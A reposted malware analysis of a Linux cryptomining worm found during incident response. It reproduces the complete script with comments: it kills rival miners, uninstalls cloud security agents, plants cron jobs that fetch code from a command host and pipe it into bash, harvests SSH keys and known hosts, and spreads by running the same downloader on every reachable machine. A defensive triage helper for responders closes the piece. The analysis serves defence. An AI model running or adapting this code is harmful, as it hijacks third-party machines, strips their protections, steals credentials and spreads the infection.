
Studying a cryptomining script

Source: reprinted from the internet. Posted: 2024-01-29 08:17:45

Background

This mining script turned up during routine incident response. On analysis it proved to be reasonably well written, so it is worth studying: it kills competing miners, strips cloud security agents, persists through several cron locations, verifies its payload by MD5, and spreads over SSH using keys and hosts harvested from the victim.

Sample analysis and notes

The sample below is reproduced as found (the comments are the analyst's, translated). Backslashes in the sed, grep and echo arguments were lost in the original reprint and have been restored; the indicators (hosts, ports, MD5 sums) are left exactly as they appear in the sample.

```bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# Disable SELinux
setenforce 0 2>/dev/null
# Raise the per-user process limit to 50000
ulimit -u 50000
# Temporarily raise vm.nr_hugepages (3 per CPU) for the miner
sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
# Kill whatever process is bound to each of these ports (competing miners), looked up by PID
netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '23.94.24.12:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '134.122.17.13:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '107.189.11.170:443'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
# Two random numbers (unused below)
rand=$(seq 0 255 | sort -R | head -n1)
rand2=$(seq 0 255 | sort -R | head -n1)
# Strip the immutable/append-only flags from these files so they can be rewritten
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
# Uninstall Alibaba Cloud's Aegis (安騎士) agent
if ps aux | grep -i '[a]liyun'; then
  (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
# Stop and disable the aliyun service
  systemctl stop aliyun.service
  systemctl disable aliyun.service
# Remove the bcm-agent cloud monitoring agent
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
# Uninstall Tencent Cloud's YunJing (雲鏡) agent
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"
# Clear the attributes on /tmp/dbused (a: append-only, i: immutable)
chattr -ai /tmp/dbused
# Use ifconfig or ip a to find the first two octets of the local address (the /16) and store them in range
if [ -s /usr/bin/ifconfig ];then
range=$(ifconfig | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
else
range=$(ip a | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
fi
# Test whether the mining pool pool.supportxmr.com resolves
if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];then
        dns=""
else
        dns="-d"
fi
# Test whether bash.givemexyz.in resolves; if not, fall back to the C2's raw IP address
if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];then
        url="http://bash.givemexyz.in"
else
        url="http://209.141.40.190"
fi
# Write the cron jobs (echo -e so the escape sequences are interpreted).
# The first three go into the system cron.d; the fourth into root's personal crontab.
# Each entry downloads $url/xms with curl, wget or python's urllib2 into /tmp/xms, runs it with bash,
# then deletes /tmp/xms. Note that $DIR is used here before it is assigned below.
echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/apache
echo -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/nginx
echo -e "*/30 * * * *(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root
# Scripts in /etc/cron.hourly run once an hour; drop one there and mark it executable
mkdir -p /etc/cron.hourly
echo "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
DIR="/tmp"
cd $DIR
if [ -a "/tmp/dbused" ]
then
    if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ] # dbused exists, is writable and is not a directory
    then
        if [ -x "$(command -v md5sum)" ] # is md5sum available?
        then
            sum=$(md5sum /tmp/dbused | awk '{ print $1 }') # MD5 of dbused
            echo $sum
            case $sum in
                dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                    echo "x86_64 OK"
                ;;
                *)
                    # Unknown payload: remove the preload library, empty ld.so.preload and kill the miner
                    echo "x86_64 wrong"
                    rm -rf /usr/local/lib/libkk.so
                    echo "" > /etc/ld.so.preload
                    pkill -f wc.conf
                    pkill -f susss
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else # no dbused file
    if [ -d "/tmp" ]
    then
        DIR="/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/tmp/.sh/dbused" ]
then
    DIR=$(mktemp -d)/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi
# get(): delete the local file $2 and replace it with a download of $1
get() {
  chattr -i $2; rm -rf $2
  wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 ||  lwp-download $1 $2 ||  chmod +x $2
}
# downloadIfNeed(): if dbused exists, verify its MD5; otherwise download it
downloadIfNeed(){
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/dbused ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                echo "x86_64 OK"
            ;;
            *)
                echo "x86_64 wrong"
                sizeBefore=$(du $DIR/x86_64)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                download
                sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}
# download(): verify the MD5 of the cached copy x86_643; on mismatch (or no md5sum) call download2
download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
                echo "x86_64 OK"
                cp $DIR/x86_643 $DIR/x86_64
        cp $DIR/x86_643 $DIR/x86_64
            ;;
            *)
                echo "x86_64 wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}
# download2(): fetch the payload for this architecture via get()
download2() {
get $url/$(uname -m) "$DIR"/dbused
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                echo "x86_64 OK"
                cp $DIR/x86_64 $DIR/x86_643
            ;;
            *)
                echo "x86_64 wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}
# judge(): if there is no established connection to the C2, download and start the miner
judge() {
    if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
    then
        get $url/$(uname -m) "$DIR"/dbused
        chmod +x "$DIR"/dbused
        "$DIR"/dbused -c $dns
        "$DIR"/dbused -pwn
        sleep 5
    else
echo "Running"
    fi
}
if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
    judge
else
     echo "Running"
fi
# Second component (bashirc): download and run it if not already connected to 104.168.71.132:80
if [ ! "$(netstat -ant|grep '104.168.71.132:80'|grep 'ESTABLISHED'|grep -v grep)" ];
then
    get $url/bashirc.$(uname -m) "$DIR"/bashirc
    chmod 777 "$DIR"/bashirc
    "$DIR"/bashirc
else
echo "Running"
fi
# Check the user crontab; if the entry is missing, wipe the crontab and recreate it
if crontab -l | grep -q "$url"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -
fi
# Harvest this machine's SSH private keys
KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
# Harvest hosts this machine has talked to
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
# Harvest usernames
USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v ".ssh"
)
# Turn the above into de-duplicated lists for the loops below
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
for user in $userlist; do
    for host in $hostlist; do
        for key in $keylist; do
            chmod +r $key; chmod 400 $key
            # Log in with the key and run the same downloader on the remote host
            ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms"
        done
    done
done
# Clean up: delete leftovers and put the immutable/append-only flags back on the cron files
rm -rf "$DIR"/2start.jpg
rm -rf "$DIR"/xmi
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
```

Points a responder should take from the sample: the cron files are re-locked with chattr +ai at the end, so removal must start with chattr -ia on every location listed; the payload is loaded through /etc/ld.so.preload (libkk.so), which hides the miner from ps and netstat on the live host; and the SSH loop means every host reachable with a key found on this machine has to be treated as suspect, not just the one where the script was found.
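As an added example (not part of the original post or of the sample itself), the read-only triage helper below checks for the three artefacts the script leaves behind: cron entries that fetch remote content and pipe it into bash, a non-empty /etc/ld.so.preload, and the set of hosts the SSH spreader would have reached, reconstructed from the same sources the sample reads (ssh config, bash history, known_hosts) without connecting anywhere. Every function takes a root directory so it can be pointed at a mounted disk image, a live host (`/`), or the constructed fixture it builds for itself; the hostname example.invalid and the 10.0.0.x addresses in that fixture are placeholders, not indicators from the sample.

```sh
#!/bin/sh
# Example triage helper, added here; not the original post's or the sample's code.
# All functions take ROOT (e.g. "/" on a live host or a mounted image) as $1.

# Download-and-pipe-to-shell pattern used by every cron entry in the sample.
FETCH_AND_RUN='(curl|wget|urllib2)[^|]*\|[[:space:]]*bash'

# Cron locations the sample writes to, relative to ROOT.
cron_files() {
    find "$1/etc/cron.d" "$1/etc/cron.hourly" "$1/var/spool/cron" -type f 2>/dev/null
}

# Print "file:line:content" for every cron line that matches FETCH_AND_RUN.
scan_cron_persistence() {
    cron_files "$1" | while read -r f; do
        grep -EnH "$FETCH_AND_RUN" "$f" 2>/dev/null || true
    done
}

# Print the non-blank lines of ld.so.preload; a clean host prints nothing.
check_ld_preload() {
    f="$1/etc/ld.so.preload"
    if [ -s "$f" ]; then
        grep -v '^[[:space:]]*$' "$f"
    fi
    return 0
}

# Hosts the sample's SSH loop would iterate over: HostName entries from ssh
# config, IPs on ssh/scp lines in bash history, and plain-text known_hosts
# entries (hashed known_hosts entries cannot be recovered this way).
lateral_scope() {
    local root="$1"
    {
        cat "$root"/root/.ssh/config "$root"/home/*/.ssh/config 2>/dev/null \
            | awk '/HostName/ {print $2}'
        cat "$root"/root/.bash_history "$root"/home/*/.bash_history 2>/dev/null \
            | grep -E '(ssh|scp)' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}'
        cat "$root"/root/.ssh/known_hosts "$root"/home/*/.ssh/known_hosts 2>/dev/null \
            | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}'
    } | grep -vw 127.0.0.1 | sort -u
}

# Constructed fixture modelled on the sample's artefacts. example.invalid stands
# in for the download host and 10.0.0.x for harvested peers (placeholders).
make_fixture() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/etc/cron.d" "$root/etc/cron.hourly" "$root/var/spool/cron/crontabs" \
             "$root/root/.ssh" "$root/home/alice/.ssh"
    echo '*/1 * * * * root (curl -fsSL http://example.invalid/xms||wget -q -O- http://example.invalid/xms)| bash -sh' \
        > "$root/etc/cron.d/root"
    echo '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' > "$root/etc/cron.d/logrotate"
    echo '* * * * * (curl -fsSL http://example.invalid/xms)| bash -sh' > "$root/var/spool/cron/crontabs/root"
    echo '/usr/local/lib/libkk.so' > "$root/etc/ld.so.preload"
    printf 'Host db\n  HostName 10.0.0.5\n  IdentityFile ~/.ssh/id_rsa\n' > "$root/root/.ssh/config"
    printf 'ssh alice@10.0.0.7\nls -la\nscp dump.sql root@10.0.0.5:/tmp/\n' > "$root/home/alice/.bash_history"
    printf '10.0.0.9 ssh-ed25519 AAAAC3...\n127.0.0.1 ssh-ed25519 AAAAC3...\n' > "$root/home/alice/.ssh/known_hosts"
    echo "$root"
}

# Stand-alone run against the fixture; pass / instead of $root on a live host.
root=$(make_fixture)
echo "== cron entries fetching remote code =="; scan_cron_persistence "$root"
echo "== ld.so.preload =="; check_ld_preload "$root"
echo "== hosts the SSH spreader would try =="; lateral_scope "$root"
rm -rf "$root"
```

On a live host, run it before killing anything: if ld.so.preload is non-empty, ps and netstat on that host may be lying, so confirm findings from a rescue environment or with statically linked tools. Remove the cron files only after `chattr -ia` on each path, since the sample re-locks them on every run.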


Tags: mining script
